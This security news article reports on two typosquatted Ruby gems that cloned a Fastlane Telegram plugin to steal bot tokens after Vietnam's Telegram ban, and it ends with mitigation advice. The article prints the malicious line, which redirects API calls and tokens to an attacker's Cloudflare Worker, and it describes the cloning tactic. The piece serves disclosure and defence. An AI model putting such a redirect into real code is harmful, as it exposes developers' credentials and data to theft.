Hackers Weaponize Ruby Gems to Steal Telegram Bot Tokens Post-Vietnam Ban

In a technically sophisticated supply chain attack, threat actors have released malicious Ruby gems designed specifically to steal Telegram bot tokens hitting developers scrambling for Telegram workarounds after Vietnam’s nationwide ban on the messaging platform.

This campaign, uncovered by Socket’s Threat Research Team, highlights a growing trend: hackers quickly exploiting geopolitical events to push targeted malware to developers and their automated build environments.

Two fake Ruby gems—fastlane-plugin-telegram-proxy and fastlane-plugin-proxy_teleram—were published days after Vietnam ordered ISPs to block Telegram on May 21, 2025.

These gems cleverly masquerade as legitimate Fastlane plugins, tools widely used to automate mobile app deployment and notifications in CI/CD (Continuous Integration/Continuous Deployment) workflows.

How the Attack Works: A Subtle Code Change With Immense Impact

Technically, the attack is both subtle and insidious. The malicious gems are near-perfect clones of the popular fastlane-plugin-telegram project.

The attacker, using aliases “Bùi nam,” “buidanhnam,” and “si_mobile,” copied not just the code but also the README and public API, preserving expected behaviors and minimizing suspicion.

The only critical change was a single line of code:

Legitimate Gem – Uses Telegram API Directly

rubyuri = URI.parse("https://api.telegram.org/bot#{token}/sendMessage")

Malicious Gem – Silent Credential Exfiltration

ruby# Threat actor's proxy C2 endpoint, not Telegram
uri = URI.parse("https://rough-breeze-0c37[.]buidanhnam95[.]workers[.]dev/bot#{token}/sendMessage")

This swap redirects every API call—including messages, files, bot tokens, and chat IDs—through a Cloudflare Worker proxy fully controlled by the attacker.

Outwardly, the gem continues working as expected, passing users’ message requests to Telegram and returning legitimate responses. However, this relay surreptitiously captures and exfiltrates all sensitive data in transit.

Data exfiltrated includes:

• Bot tokens (granting full programmatic access to Telegram bots)
• Chat identifiers and message content
• File attachments (potentially sensitive build logs, binaries, or credentials)
• Optional proxy credentials, if unwittingly supplied by users

There are no additional checks or conditions in the code—no geofencing, sandbox detection, or locale-specific logic. This means the malware indiscriminately steals data from any environment where it is installed.

Technical Analysis: Typosquatting and Proxy Abuse

The threat actor employed a classic typosquatting strategy to maximize reach.

Both malicious gems used near-miss names—fastlane-plugin-telegram-proxy and fastlane-plugin-proxy_teleram—to blend into the RubyGems ecosystem, capitalizing on minor spelling mistakes or intuitive search queries by developers.

The attacker also forked the official plugin repository to lend credibility, using it as the homepage reference for their fake gems.

The attacker’s Cloudflare Worker endpoint claims not to log or modify bot tokens, but this assertion is unverifiable and misleading, as the source code is not published.

The relay’s technical opacity, combined with the silent data exfiltration, is a textbook example of supply chain compromise where a single, hard-to-spot code change opens a persistent backdoor.

Fastlane plugins frequently run within CI/CD services—handling release binaries, signing keys, and other environment secrets.

A stolen Telegram bot token can grant attackers visibility into deployment notifications, issue commands, or even leak sensitive post-build artifacts.

Because CI/CD systems are typically automated and trusted, malicious gems can compromise numerous production environments before detection.

Vietnam Telegram Ban and Global Supply Chain Risks

The campaign’s timing lines up with Vietnam’s May 2025 Telegram ban. The attacker’s Vietnamese-encoded identity and the rapid release of “proxy” plugins suggest the operation was tailored to exploit local demand as developers sought workarounds to restore critical Telegram-based notifications and workflows.

However, the malware itself is not region-locked—no code restricts its behavior to Vietnam. Any developer, anywhere, who installs these gems is at risk of credential theft and supply chain compromise.

Recommendations and Mitigation

Security teams and developers should move fast:

• Immediately remove and audit for fastlane-plugin-telegram-proxy and fastlane-plugin-proxy_teleram.
• Revoke and rotate all Telegram bot tokens used with affected plugins.
• Block outbound traffic to *.workers[.]dev unless required, and review logs for anomalous connections to the C2 domain.
• Pin dependencies and scrutinize any “proxy” plugin updates, especially after regional platform bans or outages.
• Use tools like Socket that automatically scan dependencies for malicious code changes and network redirects.

This incident underscores how attackers weaponize minor code edits in trusted package repositories to execute powerful credential theft campaigns.

As software supply chain attacks grow in frequency and sophistication, automated dependency security and vigilant developer awareness remain critical defenses.